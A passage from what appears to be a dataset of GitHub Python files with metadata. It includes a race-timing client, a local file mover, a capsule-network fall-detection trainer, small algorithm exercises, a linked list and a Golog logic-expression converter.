thread.join()\n","repo_name":"PaulSD/Tray_Apps","sub_path":"time_app.py","file_name":"time_app.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7109284453","text":"from nis import match\nfrom re import S\nfrom unittest import case\nimport requests\nfrom datetime import datetime\n\n\n\nurl = \"http://localhost:8080/\"\n\nloop = True\n\nwhile(loop):\n dorsal = input(\"Insira a dorsal: \")\n \n evento = input(\"Insira o evento: \")\n\n start = input(\"Insira o tempo de partida: \")\n start_parse = datetime.strptime(start, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p1 = input(\"Insira o tempo do primeiro ponto intermédio: \")\n p1_parse = datetime.strptime(p1, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p2 = input(\"Insira o tempo do segundo ponto intermédio: \")\n p2_parse = datetime.strptime(p2, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p3 = input(\"Insira o tempo do terceiro ponto intermédio: \")\n p3_parse = datetime.strptime(p3, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n finish = input(\"Insira o tempo de chegada: \")\n finish_parse = datetime.strptime(finish, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n request = { \"dorsal\": dorsal, \"evento\": evento, \"start\": start_parse, \"p1\": p1_parse, \"p2\": p2_parse, \"p3\": p3_parse, \"finish\": finish_parse }\n response = requests.post(f\"{url}sensores\",json=request)\n\n \n \n \n\n print(\" \")\n aux = input(\"Deseja continuar? 
(y/n): \")\n if(aux == 'y'):\n continue\n elif(aux == 'n'):\n loop = False \n else:\n print(\"Invalid Option\")","repo_name":"goncaloacorreia/SD-Work2","sub_path":"AppCliente/sensores.py","file_name":"sensores.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7850581209","text":"import os\r\nimport shutil\r\n\r\nsourcePath=\"C:/Users/Admin/Desktop/p102\"\r\ndestPath=\"C:/Users/Admin/Desktop/d102/docs\"\r\n\r\nfileList=os.listdir(sourcePath)\r\nprint(fileList)\r\n\r\nfor file in fileList:\r\n name,ext=os.path.splitext(file)\r\n if ext=='':\r\n continue\r\n if ext in ['.txt','.docx']:\r\n path1=sourcePath+'/'+file\r\n path2=destPath+'/'+file\r\n shutil.move(path1,path2)\r\n print(path1)\r\n print(path2)","repo_name":"soham-fast/New-folder","sub_path":"p102.py","file_name":"p102.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26390343746","text":"import numpy as np\r\nfrom keras import layers, models, optimizers\r\nfrom keras import backend as K\r\nfrom keras.utils import to_categorical\r\nimport matplotlib.pyplot as plt\r\nfrom utils import combine_images\r\nfrom PIL import Image\r\nfrom capsulelayers import CapsuleLayer, PrimaryCap, Length, Mask\r\nimport scipy.io as sio\r\nfrom scipy import ndimage, misc\r\nimport os\r\nimport scipy\r\nfrom keras.utils import np_utils\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.cross_validation import cross_val_score, cross_val_predict\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold \r\n#path = 'C:/Users/Hamidreza/Desktop/FALL DETECTION PROJECT/200 Hz/video/Images/imagecolor/'\r\npath = 'C:/Users/Hamidreza/Desktop/data/imcoloraug10/'\r\n\r\nSSS=3360\r\ndata = np.zeros((SSS,64,68,3))\r\nzz=[]\r\n\r\nfor i in range(SSS): \r\n zz.append(str(i)+\".jpg\")\r\n\r\nfor ii, imagee in enumerate(zz):\r\n path2 = os.path.join(path, imagee)\r\n image2 = ndimage.imread(path2)\r\n image2=image2.astype(np.float64)\r\n image2= scipy.misc.imresize(image2, 0.5)\r\n data[ii,:,:,:]=image2/255\r\n\r\nimport csv\r\nwith open('C:/Users/Hamidreza/Desktop/data/labfall.csv', 'r') as mf:\r\n#with open('C:/Users/Hamidreza/Desktop/FALL DETECTION PROJECT/200 Hz/video/Images/Final/lab.csv', 'r') as mf:\r\n re = csv.reader(mf,delimiter=',',quotechar='|')\r\n re=np.array(list(re))\r\n label = re.astype(np.float64)\r\n label=np.squeeze(label) \r\n \r\nlabel=np.repeat(label,10)\r\n \r\nK.set_image_data_format('channels_last')\r\n\r\ndef CapsNet(input_shape, n_class, routings):\r\n\r\n x = layers.Input(shape=input_shape)\r\n\r\n # Layer 1: Just a conventional Conv2D layer\r\n conv1 = layers.Conv2D(filters=8, kernel_size=3, strides=1, padding='valid', activation='relu', name='conv1')(x)\r\n #64\r\n # Layer 2: Conv2D layer with `squash` activation, then reshape to [None, num_capsule, dim_capsule]\r\n primarycaps = PrimaryCap(conv1, dim_capsule=8, n_channels=8, kernel_size=3, strides=2, padding='valid')\r\n\r\n # Layer 3: Capsule layer. Routing algorithm works here.\r\n digitcaps = CapsuleLayer(num_capsule=n_class, dim_capsule=8, routings=routings,\r\n name='digitcaps')(primarycaps)\r\n\r\n # Layer 4: This is an auxiliary layer to replace each capsule with its length. 
Just to match the true label's shape.\r\n # If using tensorflow, this will not be necessary. :)\r\n out_caps = Length(name='capsnet')(digitcaps)\r\n\r\n # Decoder network.\r\n y = layers.Input(shape=(n_class,))\r\n masked_by_y = Mask()([digitcaps, y]) # The true label is used to mask the output of capsule layer. For training\r\n masked = Mask()(digitcaps) # Mask using the capsule with maximal length. For prediction\r\n\r\n # Shared Decoder model in training and prediction\r\n decoder = models.Sequential(name='decoder')\r\n decoder.add(layers.Dense(64, activation='relu', input_dim=8*n_class))#512\r\n decoder.add(layers.Dense(128, activation='relu'))#1024\r\n decoder.add(layers.Dense(np.prod(input_shape), activation='sigmoid'))\r\n decoder.add(layers.Reshape(target_shape=input_shape, name='out_recon'))\r\n\r\n # Models for training and evaluation (prediction)\r\n train_model = models.Model([x, y], [out_caps, decoder(masked_by_y)])\r\n eval_model = models.Model(x, [out_caps, decoder(masked)])\r\n\r\n return train_model, eval_model\r\n\r\n\r\ndef margin_loss(y_true, y_pred):\r\n\r\n L = y_true * K.square(K.maximum(0., 0.9 - y_pred)) + \\\r\n 0.5 * (1 - y_true) * K.square(K.maximum(0., y_pred - 0.1))\r\n\r\n return K.mean(K.sum(L, 1))\r\n\r\n\r\ndef train(model,x_train,y_train,x_test, y_test, args):\r\n \r\n # callbacks\r\n log = callbacks.CSVLogger(args.save_dir + '/log.csv')\r\n tb = callbacks.TensorBoard(log_dir=args.save_dir + '/tensorboard-logs',\r\n batch_size=args.batch_size, histogram_freq=int(args.debug))\r\n checkpoint = callbacks.ModelCheckpoint(args.save_dir + '/weights-{epoch:02d}.h5', monitor='val_capsnet_acc',\r\n save_best_only=True, save_weights_only=True, verbose=1)\r\n lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.lr * (args.lr_decay ** epoch))\r\n\r\n # compile the model\r\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\r\n loss=[margin_loss, 'binary_crossentropy'],\r\n loss_weights=[1., args.lam_recon],\r\n metrics={'capsnet': 'accuracy'})\r\n\r\n\r\n # Training without data augmentation:\r\n model.fit([x_train, y_train], [y_train, x_train], batch_size=args.batch_size, epochs=args.epochs,\r\n validation_data=[[x_test, y_test], [y_test, x_test]], callbacks=[log, tb, checkpoint, lr_decay])\r\n\r\n model.save_weights(args.save_dir + '/trained_model.h5')\r\n print('Trained model saved to \\'%s/trained_model.h5\\'' % args.save_dir)\r\n\r\n from utils import plot_log\r\n plot_log(args.save_dir + '/log.csv', show=True)\r\n\r\n return model\r\n\r\n\r\ndef test(model, x_test, y_test, args):\r\n y_pred= model.predict(x_test, batch_size=8)\r\n print('Test acc:', np.sum(np.argmax(y_pred, 1) == np.argmax(y_test, 1))/y_test.shape[0])\r\n \r\n\r\ndef load_data():\r\n# O=2880\r\n# x_train=data[:O,:,:,:]\r\n# x_test=data[O:,:,:,:]\r\n# y_train=label[:O]\r\n# y_test=label[O:]\r\n# m=4\r\n# \r\n# kf=KFold(5, random_state=None, shuffle=False)\r\n# kf.get_n_splits(data)\r\n# k=0\r\n# for train_index, test_index in kf.split(data):\r\n# x_train, x_test = data[train_index], data[test_index]\r\n# y_train, y_test = label[train_index], label[test_index]\r\n# \r\n# if k==m:\r\n# break \r\n# k=k+1\r\n x_train, x_test, y_train, y_test = train_test_split(data, label, test_size=0.95)\r\n y_test2=y_test\r\n print(x_train.shape, y_train.shape)\r\n print(x_test.shape, y_test.shape)\r\n x_train = x_train.reshape(-1, 64, 68, 3).astype('float32') \r\n x_test = x_test.reshape(-1, 64, 68, 3).astype('float32') \r\n# x_train = x_train.reshape(-1, 28, 28, 1).astype('float32') / 
255.\r\n# x_test = x_test.reshape(-1, 28, 28, 1).astype('float32') / 255.\r\n y_train = to_categorical(y_train.astype('float32'))\r\n y_test = to_categorical(y_test.astype('float32'))\r\n return x_train, y_train, x_test, y_test, y_test2\r\n\r\n \r\nif __name__ == \"__main__\":\r\n import os\r\n import argparse\r\n from keras import callbacks\r\n\r\n # setting the hyper parameters\r\n parser = argparse.ArgumentParser(description=\"CapsFall\")\r\n parser.add_argument('--epochs', default=20, type=int)\r\n parser.add_argument('--batch_size', default=100, type=int)\r\n parser.add_argument('--lr', default=0.001, type=float,\r\n help=\"Initial learning rate\")\r\n parser.add_argument('--lr_decay', default=1, type=float,\r\n help=\"The value multiplied by lr at each epoch. Set a larger value for larger epochs\")\r\n parser.add_argument('--lam_recon', default=0.392, type=float,\r\n help=\"The coefficient for the loss of decoder\")\r\n parser.add_argument('-r', '--routings', default=3, type=int,\r\n help=\"Number of iterations used in routing algorithm. should > 0\")\r\n parser.add_argument('--shift_fraction', default=0.1, type=float,\r\n help=\"Fraction of pixels to shift at most in each direction.\")\r\n parser.add_argument('--debug', action='store_true',\r\n help=\"Save weights by TensorBoard\")\r\n parser.add_argument('--save_dir', default='./result')\r\n parser.add_argument('-t', '--testing', action='store_true',\r\n help=\"Test the trained model on testing dataset\")\r\n parser.add_argument('-w', '--weights', default=None,\r\n help=\"The path of the saved weights. Should be specified when testing\")\r\n args = parser.parse_args()\r\n print(args)\r\n\r\n if not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\n # load data\r\n x_train, y_train, x_test, y_test, y_test2 = load_data()\r\n\r\n input_shape= x_train.shape[1:4] \r\n\r\n # define model\r\n model, eval_model = CapsNet(input_shape=x_train.shape[1:],\r\n n_class=len(np.unique(np.argmax(y_train, 1))),\r\n routings=args.routings)\r\n model.summary()\r\n\r\n # train or test\r\n if args.weights is not None: # init the model weights with provided one\r\n model.load_weights(args.weights)\r\n if not args.testing:\r\n train(model=model, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test, args=args)\r\n else: # as long as weights are given, will run testing\r\n if args.weights is None:\r\n print('No weights are provided. 
Will test using random initialized weights.')\r\n test(model=eval_model, x_test=x_test, y_test=y_test, args=args)\r\n model=eval_model\r\n y_pred= model.predict(x_test, batch_size=40)\r\n y_pred=y_pred[0]\r\n \r\n print('Test acc:', np.sum(np.argmax(y_pred, 1) == np.argmax(y_test, 1))/y_test.shape[0])\r\n y_pred = np.argmax(y_pred, axis=1)\r\n y_pred =y_pred.astype(np.float64)\r\n labels = {1:'Non-Fall', 2:'Fall'}\r\n print(classification_report(y_pred, y_test2,\r\n target_names=[l for l in labels.values()]))\r\n r22= metrics.r2_score(y_test2, y_pred)\r\n print('R2:', r22)","repo_name":"data-man-34/CapsFall","sub_path":"capsfall.py","file_name":"capsfall.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17571052226","text":"class Solution:\n \"\"\"\n @param: nums: an integer array\n @return:\n \"\"\"\n def moveZeroes_1(self, nums):\n # two pointers:\n # assign the non-zero number in the nums, starting from the beginning of nums\n # assign 0 to from start to end of nums\n index = 0 # the index from 0\n start = 0 # pointer, which is pointed to non-zero\n\n while index < len(nums) and start < len(nums):\n # find the nums is not equal to 0\n while start < len(nums) and nums[start] == 0:\n start += 1\n\n if start < len(nums):\n nums[index] = nums[start]\n index += 1\n start += 1\n\n while index < len(nums):\n nums[index] = 0\n index += 1\n\n\n def moveZeroes_2(self, nums):\n #\n index = 0\n right = 0\n\n while right < len(nums):\n if nums[right] != 0:\n nums[right], nums[index] = nums[index], nums[right]\n index += 1\n\n right += 1\n\n#\n# def main():\n# s = Solution()\n# nums = [0, 0, 0]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 2, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 0, 2, 0, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 2, 3, 0, 0]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [0, 0, 1, 2, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n#\n# if __name__ == '__main__':\n# main()\n","repo_name":"HS4MORVEL/Lintcode-solution-in-Python","sub_path":"539_move_zeroes.py","file_name":"539_move_zeroes.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"9233895055","text":"companies={}\nwhile True:\n command = input()\n if command == \"End\":\n break\n company, employee = command.split(\" -> \")\n if company not in companies:\n companies[company]=[]\n if employee not in companies[company]:\n companies[company].append(employee)\n\nsorted_companies=dict(sorted(companies.items(), key=lambda x: x[0]))\n\nfor company,employee in sorted_companies.items():\n print(company)\n for employee in sorted_companies[company]:\n print(f\"-- {employee}\")\n","repo_name":"Pandam0n1um/SoftUni-Software-Engineering","sub_path":"Programming Fundamentals with Python - September 2021/09_Dictionaries/exer_10_company_users.py","file_name":"exer_10_company_users.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11491394169","text":"from typing import *\nimport sys\n\n\nclass Node:\n val = 0\n next = None\n\n def __init__(self, val):\n self.val = val\n\n\nclass LL:\n head = None\n\n def __init__(self):\n self.head = None\n\n def insert_node(self, position, value):\n\n header = self.head\n\n if position < 1:\n return\n\n if position == 1:\n self.head = Node(value)\n self.head.next 
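
A NumPy restatement of the capsule-network margin loss that margin_loss in capsfall.py above computes: L = T_c * max(0, 0.9 - ||v_c||)^2 + 0.5 * (1 - T_c) * max(0, ||v_c|| - 0.1)^2, summed over classes and averaged over the batch. The toy y_true/y_pred values are invented:

import numpy as np

def margin_loss_np(y_true, y_pred, m_plus=0.9, m_minus=0.1, lam=0.5):
    # y_true: one-hot (batch, classes); y_pred: capsule lengths in [0, 1]
    present = y_true * np.maximum(0.0, m_plus - y_pred) ** 2
    absent = lam * (1.0 - y_true) * np.maximum(0.0, y_pred - m_minus) ** 2
    return np.mean(np.sum(present + absent, axis=1))

y_true = np.array([[1.0, 0.0], [0.0, 1.0]])
y_pred = np.array([[0.8, 0.2], [0.3, 0.6]])
print(margin_loss_np(y_true, y_pred))
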
= header\n return self.head\n iter_head = self.head\n while iter_head is not None and iter_head.next is not None and position > 2:\n iter_head = iter_head.next\n position -= 1\n\n if position != 2:\n return\n\n if iter_head is None:\n return\n\n tmp = iter_head.next\n iter_head.next = Node(value)\n iter_head.next.next = tmp\n\n return\n\n def delete_node(self, position):\n\n if position < 1:\n return\n\n if position == 1:\n if self.head is None:\n return None\n header = self.head.next\n self.head = header\n return\n iter_head = self.head\n while iter_head is not None and position > 2:\n iter_head = iter_head.next\n position -= 1\n\n if iter_head is None or iter_head.next is None:\n return\n\n iter_head.next = iter_head.next.next\n return\n # @param position, integer\n # @return an integer\n\n def print_ll(self):\n header = self.head\n while self.head is not None:\n if self.head.next is None:\n print(self.head.val, end=\"\")\n else:\n print(self.head.val, end=\" \")\n self.head = self.head.next\n self.head = header\n return\n # Output each element followed by a space\n\n\nlinkedlist = LL()\n\n\ndef insert_node(position, value):\n linkedlist.insert_node(position, value)\n\n\ndef print_ll():\n linkedlist.print_ll()\n print()\n\n\ndef delete_node(position):\n linkedlist.delete_node(position)\n\n#\n# print(\"Hi\")\n# t = int(input())\n#\n# while t > 0:\n# arr = sys.stdin.readline().strip().split()\n# if arr[0] == 'i':\n# insert_node(int(arr[1]), int(arr[2]))\n# if arr[0] == 'p':\n# print_ll()\n# if arr[0] == 'd':\n# delete_node(int(arr[1]))\n# t -= 1\n","repo_name":"akashdeep3194/Scaler","sub_path":"d32/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5634274070","text":"import json\nimport pandas as pd\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef main():\n payload = {}\n df = pd.read_csv(f\"{path}/files/clean/dataset_clima.csv\")\n df.tiempo = df.tiempo.astype(\"datetime64\")\n days = [\"Lun\", \"Mar\", \"Mie\", \"Jue\", \"Vie\", \"Sab\", \"Dom\"]\n for j in range(1, 13):\n data = []\n for i in range(2017, 2021):\n traces = {}\n traces[\"type\"] = \"scatter\"\n\n mydf = df.loc[(df[\"tiempo\"].dt.year == i) & (df[\"tiempo\"].dt.month == j)]\n mydf = mydf.groupby(mydf[\"tiempo\"].dt.weekday).mean().reset_index()\n traces[\"x\"] = days\n traces[\"y\"] = list(mydf[\"energia_activa\"].values)\n traces[\"name\"] = i\n traces[\"mode\"] = \"lines\"\n traces[\"line\"] = {\"shape\": \"spline\"}\n data.append(traces)\n payload[j] = data\n print(json.dumps({\"status\": \"ok\", \"msg\": payload}))\n\n\nmain()\n","repo_name":"jcdaniel14/react-visual","sub_path":"api/scripts/ml/get_facets.py","file_name":"get_facets.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24456502751","text":"\"\"\"Write a Python program to count the number of characters (character\nfrequency) in a string. 
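
The core aggregation in get_facets.py above is a groupby on the weekday of a datetime column; a self-contained sketch with an invented two-column frame standing in for dataset_clima.csv:

import pandas as pd

df = pd.DataFrame({
    "tiempo": pd.date_range("2020-01-01", periods=10, freq="D"),
    "energia_activa": range(10),
})
jan = df[(df["tiempo"].dt.year == 2020) & (df["tiempo"].dt.month == 1)]
by_weekday = jan.groupby(jan["tiempo"].dt.weekday)["energia_activa"].mean()
print(by_weekday)  # index 0 = Monday ... 6 = Sunday
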
Sample String : google.com\nExpected Result : {'o': 3, 'g': 2, '.': 1, 'e': 1, 'l': 1, 'm': 1, 'c': 1}\n\"\"\"\ndef find_string_count(word):\n dict={}\n for each in set(word):\n dict[each]=word.count(each)\n return dict\n\nif __name__ == '__main__':\n inputWord=input('Enter any Word')\n result=find_string_count(inputWord)\n print(result)\n","repo_name":"PreritBhandari/python-programs","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7772264638","text":"\naction_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression = {} \n# init dict : 'hig_name(=xxx)' -> {'arg_1':'BlockType';'arg_6':'BlockType';......}\ndef add_global_args_declear_andlist_dict(key,value): # called by Nested_list2FOLExp().run_s Nested_list2FOLExpressionwithSituation function:\n global action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression\n action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression[key] = value # ,\n \nimport copy\nclass ActionMapGolog :\n def __init__(self,actionMaplist:list()) -> None:\n self.act_map_golog_dict = dict()\n GologTreeObj = GologExprTree()\n cplist = copy.deepcopy(actionMaplist)\n thegologprogramnodeTree = GologTreeObj.recursive_build_golog_tree(cplist[1]) # build the golog tree for mapping low golog program\n GologTreeObj.loop_set_s_i_s_o(thegologprogramnodeTree) # set the golog tree nodes's: 's_i' & 's_o'\n self.act_map_golog_dict[cplist[0][0]] = thegologprogramnodeTree\n\n def __str__(self) -> str:\n return str(self.act_map_golog_dict)\n \n\nclass Nested_list2FOLExp:\n def __init__(self):\n self.FOL_Exp = \"\"\n self.const_declare_in_andlist = {}# andlistrefinementMaparg_3 \n\n def insertConsForSort(self,OneOfUntyped_variableslist,curtype):\n \"\"\"add to self.ConsForSort if not added before\"\"\"\n if OneOfUntyped_variableslist not in self.const_declare_in_andlist:\n self.const_declare_in_andlist[OneOfUntyped_variableslist] = curtype\n else:\n if self.const_declare_in_andlist[OneOfUntyped_variableslist] == curtype:\n pass # already added before,just pass\n else:\n raise Exception(OneOfUntyped_variableslist +' is already defined as ' \\\n + self.const_declare_in_andlist[OneOfUntyped_variableslist] \\\n + '.For theorem prove,it can not defined again with another sort:' + curtype)\n # @staticmethod\n def run(self, group):\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # clear(A),\n return self.FOL_Exp\n\n def Nested_list2FOLExpression(self, group):\n \"\"\"self.Nested_list2FOLExpression\"\"\"\n while group:\n cur = group.pop(0)\n if type(cur) == type(list()):\n self.Nested_list2FOLExpression(cur) # nested list\n elif type(cur) == type(str()):\n if cur == 'and' or cur == 'And':\n if len(group) == 1:\n self.Nested_list2FOLExpression(group)\n else: # >1,\"and(1,2,...)\"\"\n self.FOL_Exp += 'And('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'\n elif cur == 'Not' or cur == 'not':\n if len(group) == 1:# ['Not',above[...]]\n self.FOL_Exp += 'Not('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'# And(Not(B==arg_3)Not(A==arg_4))\n else:\n raise Exception(\"\\'Not\\' only accept one args.\")\n elif cur == 'or' or cur == 'Or':\n if 
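
collections.Counter produces the same character-frequency mapping as the set/count loop in the exercise above, in a single O(n) pass rather than one count() scan per distinct character:

from collections import Counter

freq = Counter("google.com")
print(freq)  # counts: o=3, g=2, and 1 each for l, e, ., c, m

Counter is a dict subclass, so freq['o'] and dict(freq) behave as expected.
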
len(group) == 1:\n self.Nested_list2FOLExpression(group)\n else: # >1,\"or(1,2,...)\"\"\n self.FOL_Exp += 'Or('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n elif cur == 'exists' or cur == 'Exists':\n cp_arg_declare_list = copy.deepcopy(group[0])\n while cp_arg_declare_list !=[]:\n cur_char_variables = cp_arg_declare_list.pop(0)# pop\n if cur_char_variables[0] == '?' and '-' in cp_arg_declare_list:\n index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # andlist self.const_declare_in_andlist \n #\n self.FOL_Exp += 'Exists(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1] # \"[x,y,\"\" ==> \"[x,y\" \n self.FOL_Exp += '],' # [x,y],\n self.FOL_Exp += '(' # [x,y],(\n group.pop(0)\n self.Nested_list2FOLExpression(group[0])\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'# '[x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()'('','\n elif cur == 'forall' or cur == 'ForAll' or cur == 'Forall':\n self.FOL_Exp += 'ForAll(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n #\n cp_arg_declare_list = copy.deepcopy(group[0])\n while cp_arg_declare_list !=[]:\n cur_char_variables = cp_arg_declare_list.pop(0)# pop\n if cur_char_variables[0] == '?' and '-' in cp_arg_declare_list:\n index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # andlist self.const_declare_in_andlist \n self.FOL_Exp = self.FOL_Exp[:-1]\n self.FOL_Exp += '],'\n self.FOL_Exp += '('# 'ForAll([x,y],(' \n group.pop(0) # ['?x','-','BlockType']\n self.Nested_list2FOLExpression(group[0])\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ',' \n self.FOL_Exp += ')'# 'ForAll([x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()\n elif cur == '==':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += (group[0].strip('?') + '==' + group[1].strip('?') + ',')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' == \\'.')\n break\n elif cur == '!=':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '!=' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' != \\'.')\n break\n else: # Predicates defined by users like \"clear A\"\n \n self.FOL_Exp += cur + '('\n if len(group) != 0:\n for each in group:\n self.FOL_Exp += each.strip('?') + ','\n group.clear() # above ['x','A'] --> []\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n else: # zero arg predicate like\"arm-empty\"\"\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ','\n break\n else:\n raise Exception('Error Input format!')\n\n\n def run_s(self, group,s_i,s_o):\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # 'clear(A,s_i),'-->'clear(A,s_i)'\n return self.FOL_Exp,self.const_declare_in_andlist# ?arg_6GologTest\n\n def Nested_list2FOLExpressionwithSituation(self, group,s_i,s_o):\n \"\"\"self.Nested_list2FOLExpressionwithSituation's_o','s_i'\"\"\"\n while group:\n cur = group.pop(0)\n if 
type(cur) == type(list()):\n self.Nested_list2FOLExpressionwithSituation(cur,s_i,s_o) # nested list\n elif type(cur) == type(str()):\n if cur == 'and' or cur == 'And':\n if len(group) == 1:\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n else: # >1,\"and(1,2,...)\"\"\n self.FOL_Exp += 'And('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'\n elif cur == 'Not' or cur == 'not':\n if len(group) == 1:# ['Not',above[...]]\n self.FOL_Exp += 'Not('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n else:\n raise Exception(\"\\'Not\\' only accept one args.\")\n elif cur == 'or' or cur == 'Or':\n if len(group) == 1:\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n else: # >1,\"or(1,2,...)\"\"\n self.FOL_Exp += 'Or('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n elif cur == 'exists' or cur == 'Exists':\n exist_args_list = []\n exist_args_dict = {} # GologTest\n cp_group_var_sort = copy.deepcopy(group[0])\n while(cp_group_var_sort):\n cur = cp_group_var_sort.pop(0)\n # if cur == '?arg_6':\n # print()\n if cur[0] == '?':\n exist_args_list.append(cur)\n if cur == '-':\n cur_sort = cp_group_var_sort.pop(0)\n for each_arg in exist_args_list:\n exist_args_dict[each_arg]= cur_sort\n add_global_args_declear_andlist_dict(each_arg,cur_sort) # action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression main.py\n exist_args_list = [] # ?x - Ball,?y - gripper\n self.const_declare_in_andlist.update(exist_args_dict) # \n # cp_arg_declare_list = copy.deepcopy(group[0])\n # while cp_arg_declare_list !=[]:\n # cur_char_variables = cp_arg_declare_list.pop(0)# pop\n # if cur_char_variables[0] == '?' 
and '-' in cp_arg_declare_list:\n # index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n # self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # # andlist self.const_declare_in_andlist \n #\n self.FOL_Exp += 'Exists(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1] # \"[x,y,\"\" ==> \"[x,y\" \n self.FOL_Exp += '],' # [x,y],\n self.FOL_Exp += '(' # [x,y],(\n group.pop(0)\n self.Nested_list2FOLExpressionwithSituation(group[0],s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'# '[x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()'('','\n elif cur == 'forall' or cur == 'ForAll' or cur == 'Forall':\n univer_args_list = []\n univer_args_dict = {} # GologTest\n cp_group_var_sort = copy.deepcopy(group[0])\n while(cp_group_var_sort):\n cur = cp_group_var_sort.pop(0)\n if cur[0] == '?':\n univer_args_list.append(cur)\n if cur == '-':\n cur_sort = cp_group_var_sort.pop(0)\n for each_arg in univer_args_list:\n 